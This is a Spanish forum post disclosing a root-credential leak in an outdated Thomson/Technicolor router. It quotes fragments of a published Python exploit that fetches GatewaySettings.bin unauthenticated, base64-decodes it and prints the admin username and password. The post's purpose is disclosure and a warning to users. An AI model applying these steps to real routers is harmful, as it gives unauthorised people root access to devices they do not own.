El libre pensamiento para un internet libre
No estas registrado.
Esto no es una lavadora: es un router.
Un router un "poco" anticuado con un diseño muy "Thomson" (ex-speedtouch, ahora Technicolor) .
¿Será por intentar hacer olvidar que crearon estos monstruos que esta empresa ha cambiado de nombre tantas veces?
Y tienen una brecha muy seria que permite a un intruso o a uno usuario no autorizado de hacerse con la contraseña root del dispositivo.
Podemos ver el "exploit" en este tema de packet storm :
Lo que ocurre es que los credenciales están
en un fichero accesible sin conocer la contraseña root
cifrados en base 64 y es una función de hash reversible
1. Se pasa por CatewaySettings.bin : vemos la variable "bifi" definida aquí
bifi = 'GatewaySettings.bin'
Par ser empleada en la petición
req = urllib2.Request('%s/%s'%(router,bifi))
2. Aquí vemos como se hace el descifrado (base 64 ) con un bucle "for"
for s in hr_data(bifi):
try:
dec = base64.decodestring(s)
Y luego se pillan los datos con el "bucle if"
if dec.find(':') != -1:
user,passwd = dec.split(':')
print '(+)- User: %s%s%s'%(G_C,user,D_C)
print '(+)- Pass: %s%s%s'%(G_C,passwd,D_C)
print '(+)- Checking if creds are OK...'
checkcreds(router,user,passwd)
No hay remedio y no habrán actualizaciones para este router.
No es aconsejable usarlo como router para su red domestica.
Los créditos para este full disclosure van a Glaysson dos Santos
Fuente:
Desconectado
Tema | Respuestas | Vistas | Ultimo mensaje |
---|---|---|---|
1 | 49 | Ayer 23:10:27 por wifiyeah | |
19 | 538 | Ayer 18:25:01 por elEstudiante | |
21 | 8766 | 01-02-2023 23:46:07 por kcdtv | |
0 | 175 | 26-01-2023 19:35:15 por kcdtv | |
Pegado: |
24 | 2265 | 26-01-2023 19:00:06 por Koala |
Ultimo usuario registrado: Facu_Hok
Usuarios registrados conectados: 0
Invitados conectados: 10
Número total de usuarios registrados: 2,422
Número total de temas: 1,629
Número total de mensajes: 15,499
Atom tema feed - Impulsado por FluxBB